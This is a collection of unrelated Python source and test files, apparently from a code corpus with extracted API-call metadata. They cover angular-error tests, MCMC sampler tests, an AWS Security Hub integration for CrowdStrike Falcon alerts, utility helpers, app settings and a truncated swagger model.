[-math.pi / 2, 0],
[0, math.pi / 2],
[math.pi / 2, math.pi / 2],
])
target_xyz = np.array([
[0, 0, -1],
[1, 0, 0],
[-1, 0, 0],
[0, 1, 0],
[0, 1, 0],
])
xyz = spherical2cartesial(spherical)
assert xyz.shape[0] == spherical.shape[0]
assert xyz.shape[1] == 3
assert isinstance(xyz, torch.Tensor)
assert np.linalg.norm(target_xyz - xyz.numpy(), axis=1).max() < 1e-5
@patch('core.train_utils.epsilon', 0)
def test_compute_angular_error_xyz_arr():
input1 = torch.Tensor([
[0.8001 / math.sqrt(2), 0.6, 0.8 / math.sqrt(2)],
[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[-1, 0, 0],
[1 / math.sqrt(2), 0, 1 / math.sqrt(2)],
])
input2 = torch.Tensor([
[0.8 / math.sqrt(2), 0.6, 0.8 / math.sqrt(2)],
[-1, 0, 0],
[0, 0, 1],
[0, 0, -1],
[-1, 0, 0],
[-1 / math.sqrt(2), 0, 1 / math.sqrt(2)],
], )
target = torch.Tensor([
0,
180,
180 / 2,
180,
0,
180 / 2,
])
output = compute_angular_error_xyz_arr(input1, input2)
assert np.max(np.abs(output.numpy() - target.numpy())) < 1e-5
@patch('core.train_utils.epsilon', 0)
def test_compute_angular_error():
input1 = torch.Tensor([
[math.pi / 2, 0],
[0, math.pi / 2],
[math.pi, 0],
[-math.pi / 2, 0],
[math.pi / 4, 0],
])
input2 = torch.Tensor([
[-math.pi / 2, 0],
[math.pi, 0],
[0, 0],
[-math.pi / 2, 0],
[-math.pi / 4, 0],
], )
target = torch.Tensor([
180,
180 / 2,
180,
0,
180 / 2,
])
output = compute_angular_error(input1, input2)
assert torch.mean(target) == output
| [
"core.train_utils.compute_angular_error",
"mock.patch",
"torch.mean",
"core.train_utils.compute_angular_error_xyz_arr",
"torch.Tensor",
"math.sqrt",
"numpy.array",
"core.train_utils.spherical2cartesial"
] | [((740, 776), 'mock.patch', 'patch', (['"""core.train_utils.epsilon"""', '(0)'], {}), "('core.train_utils.epsilon', 0)\n", (745, 776), False, 'from mock import patch\n'), ((1504, 1540), 'mock.patch', 'patch', (['"""core.train_utils.epsilon"""', '(0)'], {}), "('core.train_utils.epsilon', 0)\n", (1509, 1540), False, 'from mock import patch\n'), ((222, 331), 'torch.Tensor', 'torch.Tensor', (['[[0, 0], [math.pi / 2, 0], [-math.pi / 2, 0], [0, math.pi / 2], [math.pi / \n 2, math.pi / 2]]'], {}), '([[0, 0], [math.pi / 2, 0], [-math.pi / 2, 0], [0, math.pi / 2],\n [math.pi / 2, math.pi / 2]])\n', (234, 331), False, 'import torch\n'), ((392, 459), 'numpy.array', 'np.array', (['[[0, 0, -1], [1, 0, 0], [-1, 0, 0], [0, 1, 0], [0, 1, 0]]'], {}), '([[0, 0, -1], [1, 0, 0], [-1, 0, 0], [0, 1, 0], [0, 1, 0]])\n', (400, 459), True, 'import numpy as np\n'), ((517, 547), 'core.train_utils.spherical2cartesial', 'spherical2cartesial', (['spherical'], {}), '(spherical)\n', (536, 547), False, 'from core.train_utils import compute_angular_error, compute_angular_error_xyz_arr, spherical2cartesial\n'), ((1272, 1320), 'torch.Tensor', 'torch.Tensor', (['[0, 180, 180 / 2, 180, 0, 180 / 2]'], {}), '([0, 180, 180 / 2, 180, 0, 180 / 2])\n', (1284, 1320), False, 'import torch\n'), ((1389, 1434), 'core.train_utils.compute_angular_error_xyz_arr', 'compute_angular_error_xyz_arr', (['input1', 'input2'], {}), '(input1, input2)\n', (1418, 1434), False, 'from core.train_utils import compute_angular_error, compute_angular_error_xyz_arr, spherical2cartesial\n'), ((1588, 1693), 'torch.Tensor', 'torch.Tensor', (['[[math.pi / 2, 0], [0, math.pi / 2], [math.pi, 0], [-math.pi / 2, 0], [math\n .pi / 4, 0]]'], {}), '([[math.pi / 2, 0], [0, math.pi / 2], [math.pi, 0], [-math.pi /\n 2, 0], [math.pi / 4, 0]])\n', (1600, 1693), False, 'import torch\n'), ((1750, 1848), 'torch.Tensor', 'torch.Tensor', (['[[-math.pi / 2, 0], [math.pi, 0], [0, 0], [-math.pi / 2, 0], [-math.pi / 4, 0]]'], {}), '([[-math.pi / 2, 0], [math.pi, 0], [0, 0], [-math.pi / 2, 0], [\n -math.pi / 4, 0]])\n', (1762, 1848), False, 'import torch\n'), ((1906, 1951), 'torch.Tensor', 'torch.Tensor', (['[180, 180 / 2, 180, 0, 180 / 2]'], {}), '([180, 180 / 2, 180, 0, 180 / 2])\n', (1918, 1951), False, 'import torch\n'), ((2012, 2049), 'core.train_utils.compute_angular_error', 'compute_angular_error', (['input1', 'input2'], {}), '(input1, input2)\n', (2033, 2049), False, 'from core.train_utils import compute_angular_error, compute_angular_error_xyz_arr, spherical2cartesial\n'), ((2061, 2079), 'torch.mean', 'torch.mean', (['target'], {}), '(target)\n', (2071, 2079), False, 'import torch\n'), ((865, 877), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (874, 877), False, 'import math\n'), ((890, 902), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (899, 902), False, 'import math\n'), ((995, 1007), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1004, 1007), False, 'import math\n'), ((1016, 1028), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1025, 1028), False, 'import math\n'), ((1081, 1093), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1090, 1093), False, 'import math\n'), ((1106, 1118), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1115, 1118), False, 'import math\n'), ((1214, 1226), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1223, 1226), False, 'import math\n'), ((1235, 1247), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (1244, 1247), False, 'import math\n')] |
import csv
import re
from os import makedirs
from os.path import abspath, basename, dirname, isdir, join
def generate_csv(path, fields, rows, quote_empty=False):
path = abspath(path)
name = basename(path)
name = re.sub('py$', 'csv', name)
cases = join(dirname(dirname(path)), 'cases')
if not isdir(cases):
makedirs(cases)
csv_path = join(cases, name)
with open(csv_path, 'w') as fobj:
writer = csv.DictWriter(fobj, fieldnames=fields, lineterminator='\n')
writer.writeheader()
with open(csv_path, 'a') as fobj:
quoting = csv.QUOTE_NONNUMERIC if quote_empty else csv.QUOTE_MINIMAL
writer = csv.writer(fobj, quoting=quoting, lineterminator='\n')
writer.writerows(rows)
| [
"csv.DictWriter",
"os.makedirs",
"csv.writer",
"os.path.join",
"os.path.dirname",
"os.path.isdir",
"os.path.basename",
"os.path.abspath",
"re.sub"
] | [((175, 188), 'os.path.abspath', 'abspath', (['path'], {}), '(path)\n', (182, 188), False, 'from os.path import abspath, basename, dirname, isdir, join\n'), ((200, 214), 'os.path.basename', 'basename', (['path'], {}), '(path)\n', (208, 214), False, 'from os.path import abspath, basename, dirname, isdir, join\n'), ((226, 252), 're.sub', 're.sub', (['"""py$"""', '"""csv"""', 'name'], {}), "('py$', 'csv', name)\n", (232, 252), False, 'import re\n'), ((367, 384), 'os.path.join', 'join', (['cases', 'name'], {}), '(cases, name)\n', (371, 384), False, 'from os.path import abspath, basename, dirname, isdir, join\n'), ((314, 326), 'os.path.isdir', 'isdir', (['cases'], {}), '(cases)\n', (319, 326), False, 'from os.path import abspath, basename, dirname, isdir, join\n'), ((336, 351), 'os.makedirs', 'makedirs', (['cases'], {}), '(cases)\n', (344, 351), False, 'from os import makedirs\n'), ((441, 501), 'csv.DictWriter', 'csv.DictWriter', (['fobj'], {'fieldnames': 'fields', 'lineterminator': '"""\n"""'}), "(fobj, fieldnames=fields, lineterminator='\\n')\n", (455, 501), False, 'import csv\n'), ((664, 718), 'csv.writer', 'csv.writer', (['fobj'], {'quoting': 'quoting', 'lineterminator': '"""\n"""'}), "(fobj, quoting=quoting, lineterminator='\\n')\n", (674, 718), False, 'import csv\n'), ((278, 291), 'os.path.dirname', 'dirname', (['path'], {}), '(path)\n', (285, 291), False, 'from os.path import abspath, basename, dirname, isdir, join\n')] |
from datetime import datetime
import traceback
import boto3
from botocore.exceptions import ClientError
from ...config import config
from ...log import log
class Submitter():
def __init__(self, event):
self.event = event
def find_instance(self, instance_id, mac_address): # pylint: disable=R0201
# Instance IDs are unique to the region, not the account, so we have to check them all
report_region = config.get('aws', 'region')
ec2instance = None
ec2_client = boto3.client("ec2")
regions = [region["RegionName"] for region in ec2_client.describe_regions()["Regions"]]
for region in regions:
ec2 = boto3.resource("ec2", region_name=region)
try:
ec2instance = ec2.Instance(instance_id)
found = False
# Confirm the mac address matches
for iface in ec2instance.network_interfaces:
det_mac = mac_address.lower().replace(":", "").replace("-", "")
ins_mac = iface.mac_address.lower().replace(":", "").replace("-", "")
if det_mac == ins_mac:
found = True
if found: # pylint: disable=R1723
return region, ec2instance
except ClientError:
continue
except Exception: # pylint: disable=W0703
trace = traceback.format_exc()
log.exception(str(trace))
continue
return report_region, ec2instance
@staticmethod
def send_to_securityhub(manifest):
client = boto3.client('securityhub', region_name=config.get('aws', 'region'))
check_response = {}
found = False
try:
check_response = client.get_findings(Filters={'Id': [{'Value': manifest["Id"], 'Comparison': 'EQUALS'}]})
for _ in check_response["Findings"]:
found = True
except ClientError:
pass
import_response = False
if not found:
try:
import_response = client.batch_import_findings(Findings=[manifest])
except ClientError as err:
# Boto3 issue communicating with SH, throw the error in the log
log.exception(str(err))
return import_response
def submit(self):
log.info("Processing detection: %s", self.event.detect_description)
det_region = config.get('aws', 'region')
send = False
try:
if self.event.instance_id:
det_region, instance = self.find_instance(self.event.instance_id, self.event.device_details["mac_address"])
if instance is None:
log.warning("Instance %s with MAC address %s not found in regions searched. Alert not processed.",
self.event.instance_id, self.event.device_details["mac_address"])
return
try:
for _ in instance.network_interfaces:
# Only send alerts for instances we can find
send = True
except ClientError:
# Not our instance
i_id = self.event.instance_id
mac = self.event.device_details["mac_address"]
log.info("Instance %s with MAC address %s not found in regions searched. Alert not processed.", i_id, mac)
except AttributeError:
# Instance ID was not provided by the detection
log.info("Instance ID not provided by detection. Alert not processed.")
if send:
sh_payload = self.create_payload(det_region)
response = self.send_to_securityhub(sh_payload)
if not response:
log.info("Detection already submitted to Security Hub. Alert not processed.")
else:
if response["SuccessCount"] > 0:
submit_msg = f"Detection submitted to Security Hub. (Request ID: {response['ResponseMetadata']['RequestId']})"
log.info(submit_msg)
def create_payload(self, instance_region):
region = config.get('aws', 'region')
try:
account_id = boto3.client("sts").get_caller_identity().get('Account')
except KeyError:
# Failed to get endpoint_resolver the first time, try it again
account_id = boto3.client("sts").get_caller_identity().get('Account')
severity_product = self.event.severity_value
severity_normalized = severity_product * 20
payload = {
"SchemaVersion": "2018-10-08",
"ProductArn": "arn:aws:securityhub:{}:517716713836:product/crowdstrike/crowdstrike-falcon".format(region),
"AwsAccountId": account_id,
"SourceUrl": self.event.falcon_link,
"GeneratorId": "Falcon Host",
"CreatedAt": datetime.utcfromtimestamp(float(self.event.event_create_time) / 1000.).isoformat() + 'Z',
"UpdatedAt": ((datetime.utcfromtimestamp(datetime.timestamp(datetime.now()))).isoformat() + 'Z'),
"RecordState": "ACTIVE",
"Severity": {"Product": severity_product, "Normalized": severity_normalized}
}
# Instance ID based detail
try:
payload["Id"] = f"{self.event.instance_id}{self.event.event_id}"
payload["Title"] = "Falcon Alert. Instance: %s" % self.event.instance_id
payload["Resources"] = [{"Type": "AwsEc2Instnace", "Id": self.event.instance_id, "Region": instance_region}]
except AttributeError:
payload["Id"] = f"UnknownInstanceID:{self.event.event_id}"
payload["Title"] = "Falcon Alert"
payload["Resources"] = [{"Type": "Other",
"Id": f"UnknownInstanceId:{self.event.event_id}",
"Region": region
}]
# Description
aws_id = ""
if self.event.cloud_provider_account_id:
aws_id = f"| AWS Account for alerting instance: {self.event.cloud_provider_account_id}"
payload["Description"] = f"{self.event.detect_description} {aws_id}"
# TTPs
try:
payload["Types"] = ["Namespace: TTPs",
"Category: %s" % self.event.original_event["event"]["Tactic"],
"Classifier: %s" % self.event.original_event["event"]["Technique"]
]
except KeyError:
payload.pop("Types", None)
# Running process detail
try:
payload["Process"] = {}
payload["Process"]["Name"] = self.event.original_event["event"]["FileName"]
payload["Process"]["Path"] = self.event.original_event["event"]["FilePath"]
except KeyError:
payload.pop("Process", None)
# Network detail
try:
payload['Network'] = self.network_payload()
except KeyError:
pass
return payload
def network_payload(self):
net = {}
net['Direction'] = \
"IN" if self.event.original_event['event']['NetworkAccesses'][0]['ConnectionDirection'] == 0 else 'OUT'
net['Protocol'] = self.event.original_event['event']['NetworkAccesses'][0]['Protocol']
net['SourceIpV4'] = self.event.original_event['event']['NetworkAccesses'][0]['LocalAddress']
net['SourcePort'] = self.event.original_event['event']['NetworkAccesses'][0]['LocalPort']
net['DestinationIpV4'] = self.event.original_event['event']['NetworkAccesses'][0]['RemoteAddress']
net['DestinationPort'] = self.event.original_event['event']['NetworkAccesses'][0]['RemotePort']
return net
class Runtime():
def __init__(self):
log.info("AWS Backend is enabled.")
def is_relevant(self, falcon_event): # pylint: disable=R0201
return falcon_event.cloud_provider == 'AWS_EC2'
def process(self, falcon_event): # pylint: disable=R0201
Submitter(falcon_event).submit()
__all__ = ['Runtime']
| [
"traceback.format_exc",
"boto3.resource",
"boto3.client",
"datetime.datetime.now"
] | [((511, 530), 'boto3.client', 'boto3.client', (['"""ec2"""'], {}), "('ec2')\n", (523, 530), False, 'import boto3\n'), ((676, 717), 'boto3.resource', 'boto3.resource', (['"""ec2"""'], {'region_name': 'region'}), "('ec2', region_name=region)\n", (690, 717), False, 'import boto3\n'), ((1420, 1442), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (1440, 1442), False, 'import traceback\n'), ((4281, 4300), 'boto3.client', 'boto3.client', (['"""sts"""'], {}), "('sts')\n", (4293, 4300), False, 'import boto3\n'), ((4463, 4482), 'boto3.client', 'boto3.client', (['"""sts"""'], {}), "('sts')\n", (4475, 4482), False, 'import boto3\n'), ((5125, 5139), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5137, 5139), False, 'from datetime import datetime\n')] |
import pytest
from buyer import serializers
@pytest.mark.django_db
def test_buyer_deserialization():
data = {
'email': '<EMAIL>',
'name': '<NAME>',
'sector': 'AEROSPACE',
'company_name': 'Example corp',
'country': 'China',
}
serializer = serializers.BuyerSerializer(data=data)
assert serializer.is_valid()
instance = serializer.save()
assert instance.email == data['email']
assert instance.name == data['name']
assert instance.sector == data['sector']
assert instance.company_name == data['company_name']
assert instance.country == data['country']
| [
"buyer.serializers.BuyerSerializer"
] | [((294, 332), 'buyer.serializers.BuyerSerializer', 'serializers.BuyerSerializer', ([], {'data': 'data'}), '(data=data)\n', (321, 332), False, 'from buyer import serializers\n')] |
#1d_tests.py
import autograd.numpy as np
import autograd.scipy.stats.norm as norm
from copy import copy
import datetime as dt
from matplotlib import pyplot as plt
import seaborn as sns
import sys; sys.path.append('..')
from mcmc import langevin, MALA, RK_langevin, RWMH, HMC
def bimodal_logprob(z):
return (np.log(np.sin(z)**2) + np.log(np.sin(2*z)**2) + norm.logpdf(z)).ravel()
def main():
#====== Setup =======
n_iters, n_samples = 2500, 500
init_vals = np.random.randn(n_samples, 1)
allsamps = []
logprob = bimodal_logprob
#====== Tests =======
t = dt.datetime.now()
print('running 1d tests ...')
samps = langevin(logprob, copy(init_vals),
num_iters = n_iters, num_samples = n_samples, step_size = 0.05)
print('done langevin in', dt.datetime.now()-t,'\n')
allsamps.append(samps)
samps = MALA(logprob, copy(init_vals),
num_iters = n_iters, num_samples = n_samples, step_size = 0.05)
print('done MALA in', dt.datetime.now()-t,'\n')
allsamps.append(samps)
samps = RK_langevin(logprob, copy(init_vals),
num_iters = n_iters, num_samples = n_samples, step_size = 0.01)
print('done langevin_RK in', dt.datetime.now()-t,'\n')
allsamps.append(samps)
t = dt.datetime.now()
samps = RWMH(logprob, copy(init_vals),
num_iters = n_iters, num_samples = n_samples, sigma = 0.5)
print('done RW MH in' , dt.datetime.now()-t,'\n')
allsamps.append(samps)
t = dt.datetime.now()
samps = HMC(logprob, copy(init_vals),
num_iters = n_iters//5, num_samples = n_samples,
step_size = 0.05, num_leap_iters=5)
print('done HMC in', dt.datetime.now()-t,'\n')
allsamps.append(samps)
#====== Plotting =======
lims = [-5,5]
names = ['langevin', 'MALA', 'langevin_RK', 'RW MH', 'HMC']
f, axes = plt.subplots(len(names), sharex=True)
for i, (name, samps) in enumerate(zip(names, allsamps)):
sns.distplot(samps, bins=1000, kde=False, ax=axes[i])
axb = axes[i].twinx()
axb.scatter(samps, np.ones(len(samps)), alpha=0.1, marker='x', color='red')
axb.set_yticks([])
zs = np.linspace(*lims, num=250)
axes[i].twinx().plot(zs, np.exp(bimodal_logprob(zs)), color='orange')
axes[i].set_xlim(*lims)
title = name
axes[i].set_title(title)
plt.show()
if __name__ == '__main__':
main() | [
"autograd.numpy.sin",
"seaborn.distplot",
"autograd.numpy.linspace",
"autograd.scipy.stats.norm.logpdf",
"datetime.datetime.now",
"autograd.numpy.random.randn",
"copy.copy",
"sys.path.append",
"matplotlib.pyplot.show"
] | [((200, 221), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (215, 221), False, 'import sys\n'), ((467, 496), 'autograd.numpy.random.randn', 'np.random.randn', (['n_samples', '(1)'], {}), '(n_samples, 1)\n', (482, 496), True, 'import autograd.numpy as np\n'), ((570, 587), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (585, 587), True, 'import datetime as dt\n'), ((1197, 1214), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1212, 1214), True, 'import datetime as dt\n'), ((1403, 1420), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1418, 1420), True, 'import datetime as dt\n'), ((2196, 2206), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2204, 2206), True, 'from matplotlib import pyplot as plt\n'), ((646, 661), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (650, 661), False, 'from copy import copy\n'), ((834, 849), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (838, 849), False, 'from copy import copy\n'), ((1025, 1040), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (1029, 1040), False, 'from copy import copy\n'), ((1238, 1253), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (1242, 1253), False, 'from copy import copy\n'), ((1443, 1458), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (1447, 1458), False, 'from copy import copy\n'), ((1840, 1893), 'seaborn.distplot', 'sns.distplot', (['samps'], {'bins': '(1000)', 'kde': '(False)', 'ax': 'axes[i]'}), '(samps, bins=1000, kde=False, ax=axes[i])\n', (1852, 1893), True, 'import seaborn as sns\n'), ((2025, 2052), 'autograd.numpy.linspace', 'np.linspace', (['*lims'], {'num': '(250)'}), '(*lims, num=250)\n', (2036, 2052), True, 'import autograd.numpy as np\n'), ((760, 777), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (775, 777), True, 'import datetime as dt\n'), ((944, 961), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (959, 961), True, 'import datetime as dt\n'), ((1141, 1158), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1156, 1158), True, 'import datetime as dt\n'), ((1346, 1363), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1361, 1363), True, 'import datetime as dt\n'), ((1576, 1593), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1591, 1593), True, 'import datetime as dt\n'), ((360, 374), 'autograd.scipy.stats.norm.logpdf', 'norm.logpdf', (['z'], {}), '(z)\n', (371, 374), True, 'import autograd.scipy.stats.norm as norm\n'), ((319, 328), 'autograd.numpy.sin', 'np.sin', (['z'], {}), '(z)\n', (325, 328), True, 'import autograd.numpy as np\n'), ((342, 355), 'autograd.numpy.sin', 'np.sin', (['(2 * z)'], {}), '(2 * z)\n', (348, 355), True, 'import autograd.numpy as np\n')] |
import qrcode
# data example
data = "www.google.com"
# file name
file_name = "qrcode.png"
# generate qr code
img = qrcode.make(data=data)
# save generated qr code as img
img.save(file_name)
| [
"qrcode.make"
] | [((118, 140), 'qrcode.make', 'qrcode.make', ([], {'data': 'data'}), '(data=data)\n', (129, 140), False, 'import qrcode\n')] |
"""
Low level miscilanious calls
"""
import UserDict
import types
import random
import datetime
import pprint
import re
import unicodedata
import logging
log = logging.getLogger(__name__)
now_override = None
def now():
"""
A passthough to get now()
We can override this so that automated tests can fake the current datetime
"""
if now_override:
return now_override
return datetime.datetime.now()
def set_now(new_now_override=None):
global now_override
now_override = None
if isinstance(new_now_override, datetime.datetime):
now_override = new_now_override
def timedelta_from_str(string_args):
"""
Convert a string containing comma separted timedelta kwargs into a timedeta object
>>> timedelta_from_str( "hours=10" ) == datetime.timedelta( hours=10)
True
>>> timedelta_from_str("days = 10, hours = 10" ) == datetime.timedelta(days=10, hours=10)
True
>>> timedelta_from_str(datetime.timedelta(minutes=1)) == datetime.timedelta(minutes=1 )
True
"""
if isinstance(string_args, basestring):
d = datetime.timedelta(**dict([(kwarg.split('=')[0].strip(), int(kwarg.split('=')[1].strip())) for kwarg in string_args.split(',')]))
if isinstance(d, datetime.timedelta) and d.total_seconds()>0:
return d
else:
return None
return string_args
def timedelta_to_str(t):
"""
Convert a timedelta object to a string representation
>>> timedelta_to_str(datetime.timedelta( hours=10))
'hours=10'
>>> timedelta_to_str(datetime.timedelta(days=5, hours=10)) in ['days=5,hours=10', 'hours=10,days=5']
True
>>> timedelta_to_str(datetime.timedelta(minutes=1 ))
'minutes=1'
"""
t = t.total_seconds()
d = dict()
for key, div in [('milliseconds',1),('seconds',60),('minutes',60),('hours',24),('days',7),('weeks',None)]:
if div:
val = t % div
else:
val = t
if val:
d[key] = val
if div:
t = int((t-val)/div)
else:
t = 0
return ",".join('='.join((key, str(value))) for key, value in d.iteritems())
def random_string(length=8):
"""
Generate a random string of a-z A-Z 0-9
(Without vowels to stop bad words from being generated!)
>>> len(random_string())
8
>>> len(random_string(10))
10
If random, it should compress pretty badly:
>>> import zlib
>>> len(zlib.compress(random_string(100))) > 50
True
"""
random_symbols = '1234567890bcdfghjklmnpqrstvwxyzBCDFGHJKLMNPQRSTVWXYZ'
r = ''
for i in range(length):
r += random_symbols[random.randint(0,len(random_symbols)-1)]
return r
def str_to_int(text, default=0):
"""
>>> str_to_int("3")
3
>>> str_to_int("moo")
0
>>> str_to_int(None)
0
>>> str_to_int(str_to_int)
0
>>> str_to_int("cake", default=6)
6
"""
try:
return int(text)
except (ValueError, TypeError):
return default
def calculate_age(born):
"""
Calculate the age of a user.
http://www.fabent.co.uk/blog/2007/08/04/calculating-age-in-python/
>>> today = datetime.date.today()
>>> ten_ago = datetime.date(today.year-10, today.month, today.day)
>>> calculate_age(ten_ago)
10
>>> calculate_age(ten_ago - datetime.timedelta(days=3))
10
>>> calculate_age(ten_ago + datetime.timedelta(days=3))
9
>>> calculate_age(datetime.date.today())
0
>>> born_odd = datetime.date(2000, 2, 29)
>>> calculate_age(born_odd) > 0
True
"""
today = datetime.date.today()
try:
birthday = datetime.date(today.year, born.month, born.day )
except ValueError:
birthday = datetime.date(today.year, born.month, born.day - 1) # Raised when person was born on 29 February and the current year is not a leap year.
if birthday > today:
return today.year - born.year - 1
else:
return today.year - born.year
def update_dict(dict_a, dict_b):
"""
Because dict.update(d) does not return the new dict
>>> a = {'a': 1, 'b': 2}
>>> update_dict(a, {'b': 3, 'c': 3})
{'a': 1, 'c': 3, 'b': 3}
"""
dict_a.update(dict_b)
return dict_a
def obj_to_dict(obj, dict_fields):
"""
Used to convert a python object to a python dict of strings, but only including requested fields
dict_fields is a dictionary of functions
if a key is set will a null function - it will check if it is a primitive type
if a key is set with a function - that function is used to convert the object to a primitive type
TODO: currenly does not follow lists or dict, just string dumps .. could be useful in future to recusivly call obj_to_dict
>>> class a:
... foo = "bar"
... def __unicode__(self):
... raise Exception('asdf')
...
>>> b = a()
>>> b.c = a()
>>> obj_to_dict(b, {'foo': None})
{'foo': u'bar'}
>>> obj_to_dict(b, {'c': None})
Traceback (most recent call last):
...
Exception: Object types are not allowed in object dictionaries [c]
"""
d = {}
for field_name in dict_fields:
field_processor = dict_fields[field_name]
field_value = None
if field_processor == None:
field_value = getattr(obj,field_name,'')
elif type(field_processor)==types.FunctionType:
field_value = field_processor(obj)
if field_value:
field_value_type = type(field_value)
if hasattr(field_value,'keys') or hasattr(field_value, '__iter__'):
pass
elif field_value_type in [types.IntType, types.FloatType, types.BooleanType]:
pass
elif field_value_type == datetime.datetime:
field_value = field_value.strftime("%Y-%m-%d %H:%M:%S")
else:
try:
field_value = unicode(field_value)
except:
raise Exception('Object types are not allowed in object dictionaries [%s]' % (field_name, ))
d[field_name] = field_value
return d
def args_to_tuple(*args, **kwargs):
"""
>>> args_to_tuple()
((), {})
>>> args_to_tuple("hello?")
(('hello?',), {})
>>> args_to_tuple("hello", name="dave")
(('hello',), {'name': 'dave'})
"""
return (args, kwargs)
def make_username(title):
"""
turn a display name into a username
>>> make_username("Bob's Cake Factory")
'bob-s-cake-factory'
"""
# GregM: Normalise unicode chars to ascii equivalents first before performing replace
# Stops Si(a with a hat)n becoming si-n
title = unicodedata.normalize("NFKD", unicode(title)).encode("ascii", "ignore")
return re.sub("[^\w-]", "-", title.lower()).strip("-")
def debug_type(var):
return "%s:%s" % (type(var), repr(var))
def substring_in(substrings, string_list):
"""
Find a substrings in a list of string_list
Think of it as
is 'bc' in ['abc', 'def']
>>> substring_in( 'bc' , ['abc','def','ghi'])
True
>>> substring_in( 'jkl' , ['abc','def','ghi'])
False
>>> substring_in(['zx','hi'], ['abc','def','ghi'])
True
>>> substring_in(['zx','yw'], ['abc','def','ghi'])
False
"""
if isinstance(substrings, basestring):
substrings = [substrings]
if not isinstance(string_list, list) or not isinstance(substrings, list):
raise TypeError('params mustbe lists')
for s in string_list:
for ss in substrings:
if ss in s:
return True
return False | [
"logging.getLogger",
"datetime.datetime.now",
"datetime.date.today",
"datetime.date"
] | [((163, 190), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (180, 190), False, 'import logging\n'), ((409, 432), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (430, 432), False, 'import datetime\n'), ((3686, 3707), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3705, 3707), False, 'import datetime\n'), ((3741, 3788), 'datetime.date', 'datetime.date', (['today.year', 'born.month', 'born.day'], {}), '(today.year, born.month, born.day)\n', (3754, 3788), False, 'import datetime\n'), ((3835, 3886), 'datetime.date', 'datetime.date', (['today.year', 'born.month', '(born.day - 1)'], {}), '(today.year, born.month, born.day - 1)\n', (3848, 3886), False, 'import datetime\n')] |
import os
from pydantic import BaseSettings
class AppSettings(BaseSettings):
debug: bool = False
time_zone: str = "Asia/Shanghai"
logger_level: str = "INFO"
logger_formatter: str = "%(asctime)s [%(name)s] %(funcName)s[line:%(lineno)d] %(levelname)-7s: %(message)s"
secret_key: str = "1@3$5^7*9)"
class DatabaseSettings(BaseSettings):
_db_port = os.getenv("POSTGRESQL_PORT") or "5432"
_db_password = os.getenv("REDIS_PASSWORD") or "password"
fastapi_uri: str = f"postgresql+asyncpg://postgres:{_db_password}@fastapi-postgresql:{_db_port}/fastapi"
class RedisSettings(BaseSettings):
_redis_port = os.getenv("REDIS_PORT") or "6379"
_redis_password = os.getenv("REDIS_PASSWORD") or "password"
fastapi_redis_uri: str = f"redis://:{_redis_password}@fastapi-redis:{_redis_port}/0?encoding=utf-8"
class DataFileSettings(BaseSettings):
basedir: str = "/app/web/data"
runtimedir: str = "/app/runtimedir"
class Settings(AppSettings, DatabaseSettings, RedisSettings, DataFileSettings):
pass
settings = Settings()
env = os.getenv("FASTAPI_ENV")
print(f"FASTAPI_ENV = {env}")
if env == "development":
from settings_dev import settings as dev_settings
for k, v in dev_settings:
if hasattr(settings, k):
setattr(settings, k, v)
elif env == "test":
from settings_test import settings as test_settings
for k, v in test_settings:
if hasattr(settings, k):
setattr(settings, k, v)
| [
"os.getenv"
] | [((1078, 1102), 'os.getenv', 'os.getenv', (['"""FASTAPI_ENV"""'], {}), "('FASTAPI_ENV')\n", (1087, 1102), False, 'import os\n'), ((374, 402), 'os.getenv', 'os.getenv', (['"""POSTGRESQL_PORT"""'], {}), "('POSTGRESQL_PORT')\n", (383, 402), False, 'import os\n'), ((432, 459), 'os.getenv', 'os.getenv', (['"""REDIS_PASSWORD"""'], {}), "('REDIS_PASSWORD')\n", (441, 459), False, 'import os\n'), ((638, 661), 'os.getenv', 'os.getenv', (['"""REDIS_PORT"""'], {}), "('REDIS_PORT')\n", (647, 661), False, 'import os\n'), ((694, 721), 'os.getenv', 'os.getenv', (['"""REDIS_PASSWORD"""'], {}), "('REDIS_PASSWORD')\n", (703, 721), False, 'import os\n')] |
# coding: utf-8
"""
Layered Insight Assessment, Compliance, Witness & Control
LI Assessment & Compliance performs static vulnerability analysis, license and package compliance. LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.10
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class AlertEvents(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'float',
